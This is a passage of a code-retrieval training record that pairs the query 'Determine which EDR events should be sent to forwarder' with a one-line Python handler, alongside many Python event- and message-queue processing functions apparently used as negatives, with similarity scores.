\"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "def run(self):\r\n while True:\r\n try:\r\n processor, iprot, oprot, otrans, callback = self.queue.get()\r\n if processor is None:\r\n break\r\n processor.process(iprot, oprot)\r\n callback(True, 
otrans.getvalue())\r\n except Exception:\r\n logging.exception(\"Exception while processing request\")\r\n callback(False, '')", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def process(self, message: Message, **kwargs: Any) -> None:\n pass", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def application_message(self, bus, msg):\n\t\tmsgtype = msg.structure.get_name()\n\t\tif msgtype == 'partial_result':\n\t\t\tself.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\telif msgtype == 'result':\n\t\t\tself.final_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\t\tself.pipeline.set_state(gst.STATE_PAUSED)", "def process(self, msg):\n raise NotImplemented", "def process_message(self, msg, src):", "def process_message(self, message):\n self.post_to_redis(message)\n return", "def dispatch(self, event):\n self.queue.put(event)", "def onMessage(self, msg, binary):\r\n self._assembler.processMessage(msg, binary)", "def emit(self, record):\n try:\n # Format: [ [queueMsgID, PID], record ]\n self.queue.put([[config.DUMMYMP_LOG_ID, os.getpid(), self.int_pid], record])\n except:\n # Something went wrong...\n self.handleError(record)", "def process(self):\n main_thread_exited = False\n\n while True:\n if not main_thread_exited and not threading.main_thread().is_alive():\n log.info(\"%s exited\", threading.main_thread().name)\n main_thread_exited = True\n self.finish()\n\n try:\n with self._lock:\n span = self._queue.get(block=False)\n if span is None:\n self._sender.close()\n log.info(\"Processing has been finished\")\n return\n\n for data in span.get_data():\n self._sender.emit_with_time(\n label=data['label'],\n timestamp=data['timestamp'],\n data=data['data']\n )\n except Empty:\n time.sleep(0.1)", "def process(self, user_event: UserEvent) -> None:\n pass", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "async def process(self, message):\n return await self.dispatcher.dispatch(message)", "def __producer__(self):\n import time\n i = 0\n while True:\n self.publish( i )\n i += 1\n time.sleep(1)", "def drive(self, event, *args):\n\n maps = self.base.get(event, self.step)\n for handle, data in maps[:]:\n params = args + data\n try:\n handle(self, *params)\n except Stop:\n break\n except StopIteration:\n pass\n except Kill, Root:\n raise\n except Erase:\n maps.remove((handle, data))\n except Exception as e:\n debug(event, params)\n\n for handle in self.pool:\n handle(self, event, args)", "def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass", "def emit(self, message):", "def _dispatch_messages(self):\n while True:\n select_obj = (yield)\n if select_obj == self._message_queue.selobj:\n msg = self._message_queue.get_nowait()\n if msg is not None:\n msg_type = msg.get('type', None)\n if msg_type is not None:\n msg_handler = 
self._message_handlers.get(msg_type, None)\n if msg_handler is not None:\n msg_handler(msg['data'])", "def put_event(self, event):\n log.info(\"==> event=%s\", event)\n assert self.subscription_list is not None\n assert self.read_queue is not None\n self.read_queue.put(event)\n log.info(\"<== \")", "def process(self, event):\n if isinstance(event, MLFRecordStartEvent):\n assert hasattr(event, 'record_filename')\n self._current = []\n elif isinstance(event, MLFLabelEvent):\n if not self._label_event_handler:\n self._current.append(event)\n else:\n self._current.append(self._label_event_handler(event))\n elif isinstance(event, MLFRecordEndEvent):\n out_event = MLFBlockEvent(event.record_filename, self._current)\n self.send(out_event)\n else:\n raise NotImplemented(\"wasn't expecting an event of type %s\" % (type(event)))", "def handle(self, message):", "def _process(self, activity):", "def process(self, message):\n if self.debug:\n self.log(\"Publishing: \" + str(message.data))\n self.channel.basic.publish(\n AMQPMessage(str(message.data)),\n self.exchange, self.routing_key)", "def process(self, message):\n if self.debug:\n self.log(\"Publishing: \" + str(message.data))\n self.channel.basic.publish(\n AMQPMessage(str(message.data)),\n self.exchange, self.routing_key)", "async def process_event(event_message, flask_app):\n if not flask_app:\n raise QueueException('Flask App not available.')\n\n with flask_app.app_context():\n message_type = event_message.get('type', None)\n\n if message_type == 'bc.registry.names.events':\n await process_name_events(event_message)", "def _dispatch(self, msg):\n self.debug(\"Dispatching message CMD %r %s\", msg.cmd, msg)\n if msg.seqno in self.listeners:\n # self.debug(\"Dispatching sequence number %d\", msg.seqno)\n sem = self.listeners[msg.seqno]\n if isinstance(sem, asyncio.Semaphore):\n self.listeners[msg.seqno] = msg\n sem.release()\n else:\n self.debug(\"Got additional message without request - skipping: %s\", sem)\n elif msg.cmd == HEART_BEAT:\n self.debug(\"Got heartbeat response\")\n if self.HEARTBEAT_SEQNO in self.listeners:\n sem = self.listeners[self.HEARTBEAT_SEQNO]\n self.listeners[self.HEARTBEAT_SEQNO] = msg\n sem.release()\n elif msg.cmd == UPDATEDPS:\n self.debug(\"Got normal updatedps response\")\n if self.RESET_SEQNO in self.listeners:\n sem = self.listeners[self.RESET_SEQNO]\n self.listeners[self.RESET_SEQNO] = msg\n sem.release()\n elif msg.cmd == SESS_KEY_NEG_RESP:\n self.debug(\"Got key negotiation response\")\n if self.SESS_KEY_SEQNO in self.listeners:\n sem = self.listeners[self.SESS_KEY_SEQNO]\n self.listeners[self.SESS_KEY_SEQNO] = msg\n sem.release()\n elif msg.cmd == STATUS:\n if self.RESET_SEQNO in self.listeners:\n self.debug(\"Got reset status update\")\n sem = self.listeners[self.RESET_SEQNO]\n self.listeners[self.RESET_SEQNO] = msg\n sem.release()\n else:\n self.debug(\"Got status update\")\n self.listener(msg)\n else:\n if msg.cmd == CONTROL_NEW:\n self.debug(\"Got ACK message for command %d: will ignore it\", msg.cmd)\n else:\n self.debug(\n \"Got message type %d for unknown listener %d: %s\",\n msg.cmd,\n msg.seqno,\n msg,\n )", "def run(self):\r\n self.env.process(self.rw_pifo_sm())", "def dispatch(self, event: str, message: str) -> None:\n\t\tfor subscriber, callback in self.get_subscribers(event).items():\n\t\t\tcallback(event, message)", "def process_processor_only_event(self, data, processor):\n processor.add_task_independant_event(data['timestamp'], data['type_of_event'], data['extra_data'])", "def process(msg, 
context, region):\n\n job_id = int(msg['ingest_job'])\n chunk_key = msg['chunk_key']\n tile_key = msg['tile_key']\n print(\"Tile key: {}\".format(tile_key))\n\n proj_info = BossIngestProj.fromTileKey(tile_key)\n\n # Set the job id\n proj_info.job_id = msg['ingest_job']\n\n print(\"Data: {}\".format(msg))\n\n # update value in the dynamo table\n tile_index_db = BossTileIndexDB(proj_info.project_name)\n chunk = tile_index_db.getCuboid(chunk_key, job_id)\n if chunk:\n if tile_index_db.cuboidReady(chunk_key, chunk[\"tile_uploaded_map\"]):\n print(\"Chunk already has all its tiles: {}\".format(chunk_key))\n # Go ahead and setup to fire another ingest lambda so this tile\n # entry will be deleted on successful execution of the ingest lambda.\n chunk_ready = True\n else:\n print(\"Updating tile index for chunk_key: {}\".format(chunk_key))\n chunk_ready = tile_index_db.markTileAsUploaded(chunk_key, tile_key, job_id)\n else:\n # First tile in the chunk\n print(\"Creating first entry for chunk_key: {}\".format(chunk_key))\n try:\n tile_index_db.createCuboidEntry(chunk_key, job_id)\n except ClientError as err:\n # Under _exceptional_ circumstances, it's possible for another lambda\n # to beat the current instance to creating the initial cuboid entry\n # in the index.\n error_code = err.response['Error'].get('Code', 'Unknown')\n if error_code == 'ConditionalCheckFailedException':\n print('Chunk key entry already created - proceeding.')\n else:\n raise\n chunk_ready = tile_index_db.markTileAsUploaded(chunk_key, tile_key, job_id)\n\n # ingest the chunk if we have all the tiles\n if chunk_ready:\n print(\"CHUNK READY SENDING MESSAGE: {}\".format(chunk_key))\n # insert a new job in the insert queue if we have all the tiles\n ingest_queue = IngestQueue(proj_info)\n ingest_queue.sendMessage(json.dumps(msg))\n\n # Invoke Ingest lambda function\n names = AWSNames.from_lambda(context.function_name)\n lambda_client = boto3.client('lambda', region_name=region)\n lambda_client.invoke(\n FunctionName=names.tile_ingest.lambda_,\n InvocationType='Event',\n Payload=json.dumps(msg).encode())\n else:\n print(\"Chunk not ready for ingest yet: {}\".format(chunk_key))\n\n print(\"DONE!\")", "def execute(self):\n self.running = True\n last_timestamp = datetime.datetime.now()\n\n self.log(\"Starting...\")\n while self.running:\n\n try:\n\n # if (datetime.datetime.now() - last_timestamp).total_seconds() < self.sendfreq:\n # self.tick()\n # continue\n\n # if self.debug:\n\n sent = 0\n while self.inbox.qsize() > 0:\n\n # Boolean flag to determine message validity\n valid = True\n\n # get message\n message = self.inbox.get_nowait()\n\n # Iterates over all the filters and overrides to modify the\n # stream's default capability.\n for modifier in self.modifiers:\n if isinstance(modifier, BaseOverride):\n message = modifier.apply(message)\n elif isinstance(modifier, BasePredicate):\n if not modifier.apply(message):\n valid = False\n\n # Must be a break and not return because setting\n # the initialization flag would be skipped if it\n # needed to be set.\n break\n\n # the incoming message was not filtered\n if valid:\n\n # process the incoming message\n self.handle(message)\n\n sent += 1\n\n if self.sendlimit > 0:\n if sent >= self.sendlimit:\n break\n\n # logging sent messages\n self.log(\"Sent %s messages...\" % (sent - 1 if sent > 0 else 0))\n\n except Empty:\n # Empty signifies that the queue is empty, so yield to another node\n pass\n except Exception:\n self.log_exception(\"Error in '%s': %s\" % (self.__class__.__name__, 
self.name))\n # self.tick()\n finally:\n # delay processing\n self.sleep(self.sendfreq)\n\n # self.tick()\n # self.stop()\n self.log(\"Exiting...\")", "def _process_message(self, obj):\n pass", "def process_sink_msg(self):\n logging.debug('Received message on the sink socket')\n \n msg = self.sink_socket.recv_json()\n \n logging.debug('Message: %s', msg)\n\n # Publish the results to the clients using the\n # request id of the service request as the topic\n self.result_pub_socket.send_unicode(msg['uuid'], zmq.SNDMORE)\n self.result_pub_socket.send_json(msg)", "def process(self, user_event: UserEvent) -> None:\n if not isinstance(user_event, UserEvent):\n self.logger.error('Provided event is in an invalid format.')\n return\n\n self.logger.debug(\n f'Received event of type {type(user_event).__name__} for user {user_event.user_id}.'\n )\n\n try:\n self.event_queue.put_nowait(user_event)\n except queue.Full:\n self.logger.warning(\n f'Payload not accepted by the queue. Current size: {self.event_queue.qsize()}'\n )", "def process(self, payload, status_code=0):", "def enqueue(self,e):", "def on_msg_recv(msg):\n print \"processor|%s::Received message: %s\" % (UID, msg.body)\n chan.basic_ack(msg.delivery_tag)\n log(msg.body)\n process_msg(msg)", "def test_process_message_queue(self):\n t = threading.Thread(target=self.handle_message_queue)\n t.start()\n\n self.dut._process_message_queue()\n\n t.join()", "def process(self, packet):\n pass", "def process_received_message(self, message):\n self.log.debug('Received \"%s\"', message)\n self.receive_queue.put(message)", "def endpoint_write_worker(endpoint, condition):\n while condition:\n msg = endpoint.message_get(block=True)\n endpoint.write(apply_filters(msg.raw_data, *endpoint.get_output_filters()))", "def queue_emission(self, msg):\n if not msg:\n return\n for _emitter in self._emit:\n if not hasattr(_emitter, 'emit'):\n continue\n def emit(emitter=_emitter):\n self.log.debug(\"emit to {}\".format(emitter.name))\n emitter.emit(msg)\n self.log.debug(\"queue emission to {} ({})\".format(\n _emitter.name, self._emit_queue.qsize()))\n self._emit_queue.put(emit)", "def consumer(state: SharedState):", "def run(self):\n init()\n list_name = comet_config.REDIS_NAMESPACE + \"incoming/\" + self.service_name\n list_name_processing = list_name + \"/processing\"\n self.redis = r\n while True:\n try:\n item = self.redis.brpoplpush(list_name, list_name_processing)\n self.process_incoming(item)\n self.redis.lrem(list_name_processing, item)\n\n except redis.ConnectionError:\n pass", "def process(self, message, callback):\n\n\t\tif message.type == message_type.EMIT:\n\t\t\t# We are in the server, the message has just been built.\n\t\t\t# Forward it nearly \"as is\". Only the message type is changed,\n\t\t\t# to make us know it has been processed one time since emission,\n\t\t\t# and thus the next hop will be the client, which has the task\n\t\t\t# to display it, and eventually get an interactive answer.\n\n\t\t\tassert ltrace(TRACE_MESSAGING, ' MessageProcessor.process(EMIT)')\n\n\t\t\tif message.interaction:\n\n\t\t\t\tif message.interaction == interactions.ASK_FOR_REPAIR:\n\n\t\t\t\t\tmessage.answer = ttyutils.interactive_ask_for_repair(message.data,\n\t\t\t\t\t\tauto_answer=message.auto_answer)\n\n\t\t\t\telif message.interaction == interactions.GET_PASSWORD:\n\n\t\t\t\t\tmessage.answer = getpass.getpass(message.data)\n\n\t\t\t\telse:\n\t\t\t\t\tassert ltrace(TRACE_MESSAGING,\n\t\t\t\t\t\t'unsupported interaction type in message %s.' 
% message)\n\t\t\t\t\tmessage.answer = None\n\n\t\t\t\tmessage.type = message_type.ANSWER\n\t\t\t\treturn callback.process(message, self.getAttrProxy())\n\n\t\t\telse:\n\t\t\t\tif message.clear_terminal:\n\t\t\t\t\tttyutils.clear_terminal(MessageProcessor.channels[message.channel])\n\n\t\t\t\tchan_flush = MessageProcessor.channels[message.channel].flush\n\t\t\t\tchan_write = MessageProcessor.channels[message.channel].write\n\n\t\t\t\tif message.word_delay:\n\t\t\t\t\tdelay = message.word_delay\n\t\t\t\t\tfor word in message.data.split(' '):\n\t\t\t\t\t\tchan_write(word + ('' if word.endswith('\\n') else ' '))\n\t\t\t\t\t\tchan_flush()\n\t\t\t\t\t\ttime.sleep(delay)\n\n\t\t\t\telif message.char_delay:\n\t\t\t\t\tdelay = message.char_delay\n\t\t\t\t\tfor char in message.data:\n\t\t\t\t\t\tchan_write(char)\n\t\t\t\t\t\tchan_flush()\n\t\t\t\t\t\ttime.sleep(min(delay*4, 0.4) if char == ' ' else delay)\n\n\t\t\t\telse:\n\t\t\t\t\tchan_write(message.data)\n\n\t\t\t\tmessage.answer = None\n\n\t\telif message.type == message_type.ANSWER:\n\t\t\t# We are on the server, this is the answer from the client to\n\t\t\t# ourquestion. Return it directly to the calling process. The\n\t\t\t# message loop ends here.\n\n\t\t\tassert ltrace(TRACE_MESSAGING, ' MessageProcessor.process(ANSWER)')\n\n\t\t\t#message.channel.write(message.data)\n\t\t\treturn message.answer\n\t\telif message.type == message_type.PUSH_STATUS:\n\n\t\t\t# FIXME: is this really needed ? will the status be really pushed by this way ?\n\t\t\tfrom licorn.core import LMC\n\t\t\tLMC.machines.update_status(mid=message.sender,\n\t\t\t\tstatus=message.status)\n\n\t\telse:\n\t\t\traise exceptions.LicornRuntimeException('''Unrecognized message '''\n\t\t\t\t'''type %s for message %s.''' % (message.type, message))", "def process_queue(self):\n while not self.msg_queue.empty():\n addr, msg = self.msg_queue.get()\n if msg:\n print(msg)\n self.broadcast(addr, msg)\n else:\n self.clean(addr)", "def _handle_message(self, msg):\n self.event('message', msg)", "def event_in_cb(self, msg):\n self.event = msg.data", "def dispatch_event(event):\n queue = connect_to_sqs() \n logging.info('Writing event to SQS:' + str(json.dumps(event.params)))\n\n visitor = event.params['visitors'][0]['visitor_id']\n attributes = event.params['visitors'][0]['attributes']\n snapshot = event.params['visitors'][0]['snapshots'][0]\n\n response = queue.send_message(MessageBody=json.dumps({visitor: (attributes, snapshot)}))", "def main(event, context):\n\n logger.info(f\"Event data is: {event}\")\n try:\n # Incoming event is already byte encoded\n client.append_message(stream_name=\"LocalDataStream\", data=event)\n except Exception as e:\n logger.error(f\"Error appending: {e}\")\n return", "def handle(self):\n if self.locked:\n self.timer.start(0.01)\n return\n if not self.queue:\n return\n self.locked = True\n event = self.queue[0]\n self.queue = self.queue[1:]\n\n try:\n for handler in copy.copy(self.handler):\n handler(event)\n except Exception, e:\n log.exception('event callback')\n self.locked = False\n if self.queue and not self.timer.active:\n self.timer.start(0)", "def handle_events(self):\n self._busy_mutext.acquire()\n try:\n event = self.EventsFactory.pull_event()\n while event:\n self.logger.debug('Handling new event: {}'.format(event.id))\n event_endpoint_scope_classes = event.EndpointScope.get_static_hierarchy()\n stat_collection = []\n for statistics_cls in self._statistics:\n if statistics_cls.EndpointScope in event_endpoint_scope_classes:\n statistics = 
statistics_cls.init_by_event(event)\n self.logger.debug(f'Collecting statistics: {statistics}')\n stat_collection.append(statistics)\n statistics.collect()\n self.logger.debug('Checking for tasks to run')\n for task_cls in self.get_conditional_tasks():\n if task_cls.EndpointScope in event_endpoint_scope_classes:\n task_endpoint_scope_classes = task_cls.EndpointScope.get_static_hierarchy()\n statistics = []\n for stats in stat_collection:\n if stats.Endpoint == task_cls.Endpoint and stats.EndpointScope in task_endpoint_scope_classes:\n statistics.append(stats)\n task = task_cls(event.EndpointScope.init_by_event(event), statistics, event)\n task.handle()\n event = self.EventsFactory.pull_event()\n finally:\n self._busy_mutext.release()", "def pickle_event_loop(self, reader, writer):\n return PROC_ERROR", "def run(self):\n while True:\n try:\n processor, iprot, oprot, otrans, callback = self.queue.get()\n if processor is None:\n break\n callback.getContext().setProtocols(iprot, oprot)\n processor.process(iprot, oprot, callback.getContext())\n callback.success(reply=otrans.getvalue())\n except Exception:\n logging.exception(\"Exception while processing request\")\n callback.failure()", "def handle_event(event, context):\n\n try:\n print(\"Received event: \" + json.dumps(event, indent=2))\n\n # grab resources section of event, get task execution ids\n task_execution_arns = event['resources']\n\n # now fetch the input filter info from each task_detail, fire off jobs\n new_files_to_process = []\n for task_execution_arn in task_execution_arns:\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/datasync.html#DataSync.Client.describe_task_execution\n response = datasync_client.describe_task_execution(TaskExecutionArn=task_execution_arn)\n print(\"Task execution details: \" + str(response))\n # this will be the location of the data in configured s3 bucket:\n # 'Includes': [\n # {\n # 'FilterType': 'SIMPLE_PATTERN',\n # 'Value': 'string'\n # },\n # ]\n if len(response['Includes']) > 0:\n file = response['Includes'][0]['Value']\n # files typically start with leading '/', strip that leading '/'\n print(\"Got filename:\" + file)\n if file.startswith('/', 0):\n new_files_to_process.append(file.lstrip('/'))\n else:\n new_files_to_process.append(file)\n else:\n print(\"Response didn't contain Includes files...\")\n\n if len(new_files_to_process) == 0:\n print('No files were parsed from input...exiting')\n return\n\n for new_file_to_process in new_files_to_process:\n state_machine_arn = os.environ['STATE_MACHINE_ARN']\n payload = {\"ObjectName\": new_file_to_process}\n json_payload = json.dumps(payload)\n print('Starting bcl2fastq with payload %s' % json_payload)\n #\n response = step_client.start_execution(stateMachineArn=state_machine_arn, input=json_payload)\n print(response)\n\n except Exception as e:\n print(e)\n print('Error handling event. 
%s' % e)\n raise e", "def _worker(pipelines: List[Pipeline], source: Queue, sink: Queue):\n pipelines = list(pipelines)\n for i, p in enumerate(pipelines):\n if isinstance(p, ConvertT2S):\n pipelines[i] = ConvertT2S()\n\n def processor(article):\n for p in pipelines:\n article = p(article)\n return article\n\n while True:\n article = source.get()\n if article == 'EXIT':\n return\n article = list(processor(article))\n sink.put(article)", "def __process_input(self):\n\n while not self.stop_event.isSet():\n\n readable, writable, exceptional = select.select([self.event_queue], [], [])\n\n if readable[0] is self.event_queue:\n\n event = self.event_queue.get()\n \n if (time.time() - event.creation) > INSTRUCTION_TIMEOUT:\n self.logging_queue.put(self.__create_event_obj(ERROR, 'TimeOut', str(time.time() - event.creation)))\n self.logger1.info(\"Instruction rejected due to timeout: '{}', '{}', '{}'\".format(event.source, event.type, event.value))\n \n elif not self.__input_filter(event):\n self.logging_queue.put(self.__create_event_obj(ERROR, 'Filtered', '{}, {}, {}'.format(event.source, event.type, event.value)))\n \n else:\n \n self.logging_queue.put(event) \n \n if event.type == self.input_commands.toggle_door_cmd:\n self.__toggle_door()\n self.__update_door_info()\n elif event.type == self.input_commands.light_cmd:\n self.__light()\n elif event.type == self.input_commands.open_door_cmd:\n self.__open_door()\n self.__update_door_info()\n elif event.type == self.input_commands.close_door_cmd:\n self.__close_door()\n self.__update_door_info()\n elif event.type == self.input_commands.control_wire:\n self.__log_output_pin_state(event)\n self.__update_door_info()\n elif event.type == self.input_commands.stop_cmd:\n self.__del__()\n return None\n \n \n #if event.hardware:\n # self.__log_input_pin_state(event) ", "def publish(self, channel, event, data):\n if not channel in self.task_methods or \\\n not event in self.task_methods[channel]:\n return\n\n data['event_name'] = event;\n\n for consumer in self.task_methods[channel][event]:\n consumer.consume(channel, event, data)", "def send_emission(self):\n if self._emit_queue.empty():\n return\n emit = self._emit_queue.get()\n emit()", "def run(self):\n\t\tfor item in self.pubSub.listen():\n\t\t\tself.processItem(item)", "def processor(self, msgs):\n for msg in msgs:\n self.stats_reset()\n self.stats_update('proc_start', \"{}\".format(dnow()))\n u_print(\" Processing message: {}\".format(msg))\n\n self.process_body(msg)\n\n self.stats_update('proc_finish', \"{}\".format(dnow()))\n self.stats_show(prefix=\" Processor finished: \")\n\n return True", "def queue_processor(self):\n\n while self.state != consts.SMPP_CLIENT_STATE_CLOSED:\n try:\n p = self.queue.get(timeout=1)\n self._request_handler(p)\n self.queue.task_done()\n except Empty:\n pass", "def _process(self):\n export_collect_data(self.kwargs[\"collect\"])", "def process(proc_data):\n\n # No further processing\n return proc_data", "def receive_event(self):\n msg = self.msg_queue.get()\n\n # get the logical clock time of the machine that sent the message\n other_system_clock = msg[msg.index(\":\") + 1:] \n \n # set the clock time to the maximum of self's clock time and other \n # system's clock time\n self.clock_time = max(self.clock_time, int(other_system_clock))\n\n # increment the logical clock time and log that a message was received\n self.clock_time += 1\n self.log(\" Received message from \" + str(msg[:msg.index(\":\")]) + \n \" with LC time \" + str(msg[msg.index(\":\") + 2:]) + \n \"; 
messages left to process: \" + str(self.msg_queue.qsize()))", "def on_message(self, unused_channel, basic_deliver, properties, body):\n\n start = time.time()\n self.invocations += 1\n\n logger.info(\n u\"[{}] received message #{} from exchange {}: {}\".format(self.bot_id,\n basic_deliver.delivery_tag, self.exchange,\n body.decode('utf-8')))\n\n self.statsd.incr(self.statsd_prefix + \"message.receive\")\n\n # Ack the message before processing to tell rabbit we got it.\n # TODO before sending ack we should persist the message in a local queue to avoid the possibility of losing it\n self.acknowledge_message(basic_deliver.delivery_tag)\n\n try:\n\n try:\n json_body = json.loads(body)\n\n except ValueError as ve:\n logger.exception(\n \"[{}] Invalid JSON received from exchange: {} error: {} msg body: []\".format(self.bot_id,\n self.exchange,\n ve.message, body))\n raise\n\n else:\n response_messages = self.callback_func(json_body)\n\n if response_messages is None:\n response_messages = []\n\n logger.info(\"[{}] Sending {} response messages\".format(self.bot_id, len(response_messages)))\n\n for message in response_messages:\n self._channel.basic_publish(exchange=message.get('exchange', self.exchange),\n routing_key=message.get('queue', self.queue_name),\n body=message.get('body'))\n logger.info(\"[{}] published message {}\".format(self.bot_id, message))\n self.statsd.incr(self.statsd_prefix + \"message.publish\")\n\n except Exception as e:\n msg = \"[{}] Unexpected error - {}, message {}, from exchange {}. sending to error queue {}\"\n self.statsd.incr(self.statsd_prefix + \"message.error\")\n logger.exception(msg.format(self.bot_id, e, body, self.exchange, self.error_queue_name))\n self._channel.basic_publish(exchange='',\n routing_key=self.error_queue_name,\n body=body)\n\n\n exec_time_millis = int((time.time() - start) * 1000)\n self.total_execution_time += exec_time_millis\n\n logger.debug(\"Consumer {0} message handling time: {1}ms\".format(self.consumer_id, exec_time_millis))\n\n # if we have processed 100 messages, log out the average execution time at INFO then reset the total\n if self.invocations % 100 == 0:\n average_execution_time = self.total_execution_time / 100\n logger.info(\"Consumer {0} Avg message handling time (last 100): {1}ms\".format(self.consumer_id, average_execution_time))\n self.total_execution_time = 0\n\n self.statsd.timing(self.statsd_prefix + 'message.process.time', int((time.time() - start) * 1000))", "def _run(self) -> None:\n try:\n while True:\n loop_time = self._get_time()\n loop_time_flush_interval = self._get_time(self.flush_interval.total_seconds())\n\n if loop_time >= self.flushing_interval_deadline:\n self._flush_batch()\n self.flushing_interval_deadline = loop_time + loop_time_flush_interval\n self.logger.debug('Flush interval deadline. Flushed batch.')\n\n try:\n interval = self.flushing_interval_deadline - loop_time\n item = self.event_queue.get(True, interval)\n\n if item is None:\n continue\n\n except queue.Empty:\n continue\n\n if item == self._SHUTDOWN_SIGNAL:\n self.logger.debug('Received shutdown signal.')\n break\n\n if item == self._FLUSH_SIGNAL:\n self.logger.debug('Received flush signal.')\n self._flush_batch()\n continue\n\n if isinstance(item, UserEvent):\n self._add_to_batch(item)\n\n except Exception as exception:\n self.logger.error(f'Uncaught exception processing buffer. Error: {exception}')\n\n finally:\n self.logger.info('Exiting processing loop. 
Attempting to flush pending events.')\n self._flush_batch()", "def run_forever(self):\n while True:\n if not self._mailbox:\n self._event.wait()\n self._event = _event.Event()\n else:\n # leave the message in the mailbox until after it's\n # been processed so the event doesn't get triggered\n # while in the received method\n self._pool.spawn_n(\n self.received, self._mailbox[0])\n self._mailbox.popleft()", "def _publish(self,e):\n # translate here....\n ev = self.__enum_event_map[int(e)]\n print ev\n # publish here....\n self.__qf.publish(event.Event(ev))\n print \"complete\"" ]
[ "0.69330835", "0.6680876", "0.654648", "0.64165616", "0.6389811", "0.6374216", "0.6304277", "0.628056", "0.6252483", "0.6216612", "0.6205624", "0.6205508", "0.61948574", "0.61800677", "0.61060655", "0.6080079", "0.60410905", "0.6012227", "0.6012227", "0.6012227", "0.6008976", "0.6003605", "0.5994585", "0.5972889", "0.596654", "0.5957519", "0.59486914", "0.594602", "0.5921459", "0.59088665", "0.5868543", "0.5851607", "0.58372694", "0.5833668", "0.5828685", "0.58161545", "0.5808509", "0.5805901", "0.57837284", "0.57802266", "0.57681906", "0.57680696", "0.57650137", "0.5761256", "0.57223207", "0.5718608", "0.5712267", "0.5709145", "0.56862694", "0.5682313", "0.56748396", "0.56741583", "0.56604475", "0.56557405", "0.56557405", "0.5651104", "0.56465334", "0.5645878", "0.5639615", "0.5637068", "0.56336844", "0.56316173", "0.5613993", "0.56106937", "0.560116", "0.55966264", "0.5594269", "0.5593989", "0.55936265", "0.5592509", "0.5591192", "0.55830973", "0.558038", "0.5574924", "0.5574018", "0.5570899", "0.5570164", "0.5564789", "0.5563145", "0.5562332", "0.55538875", "0.5547865", "0.55478376", "0.55453426", "0.5543266", "0.55418336", "0.55311656", "0.5518022", "0.55179226", "0.55048764", "0.5501443", "0.550063", "0.5497633", "0.5497462", "0.54961985", "0.54923505", "0.5484489", "0.54833126", "0.54829997", "0.5469622" ]
0.62044877
12
Determine which EDR events should be sent to forwarder
def on_starting(self): self.set_capture_events_from_config()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_capture_events_from_config(self):\n\n event_config = [\n {\n \"config_key\": \"events_watchlist\",\n \"events\": [\n \"watchlist.hit.process\",\n \"watchlist.hit.binary\",\n \"watchlist.storage.hit.process\",\n \"watchlist.storage.hit.binary\"\n ],\n \"options\": self.forwarder_options.get(\"wlhitnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_feed\",\n \"events\": [\n \"feed.ingress.hit.process\",\n \"feed.ingress.hit.binary\",\n \"feed.ingress.hit.host\",\n \"feed.storage.hit.process\",\n \"feed.storage.hit.binary\",\n \"feed.query.hit.process\",\n \"feed.query.hit.binary\"\n ],\n \"options\": self.forwarder_options.get(\"feedhitnotif\", \"0\")\n },\n {\n \"config_key\": \"events_alert\",\n \"events\": [\n \"alert.watchlist.hit.ingress.process\",\n \"alert.watchlist.hit.ingress.binary\",\n \"alert.watchlist.hit.ingress.host\",\n \"alert.watchlist.hit.query.process\",\n \"alert.watchlist.hit.query.binary\"\n ],\n \"options\": self.forwarder_options.get(\"alertnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_raw_sensor\",\n \"events\": [\n \"ingress.event.process\",\n \"ingress.event.procstart\",\n \"ingress.event.netconn\",\n \"ingress.event.procend\",\n \"ingress.event.childproc\",\n \"ingress.event.moduleload\",\n \"ingress.event.module\",\n \"ingress.event.filemod\",\n \"ingress.event.regmod\"\n \t\"ingress.event.tamper\",\n \t\t\"ingress.event.crossprocopen\",\n \t\t\"ingress.event.remotethread\",\n \t\t\"ingress.event.processblock\",\n \t\t\"ingress.event.emetmitigation\",\n ],\n \"options\": self.forwarder_options.get(\"rawsensnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_binary_observed\",\n \"events\": [\"binaryinfo.host.observed\",\n \"binaryinfo.observed,\"\n \"binaryinfo.group.observed\"],\n\n \"options\": self.forwarder_options.get(\"binobsnotifenabled\", \"0\")\n },\n {\n \"config_key\": \"events_binary_upload\",\n \"events\": [\"binarystore.file.added\"],\n \"options\": self.forwarder_options.get(\"binuplnotifenabled\", \"0\")\n }\n ]\n\n self.capture_events = []\n for event_type in event_config:\n events = self.forwarder_options.get(event_type[\"config_key\"], \"0\").lower()\n if events == 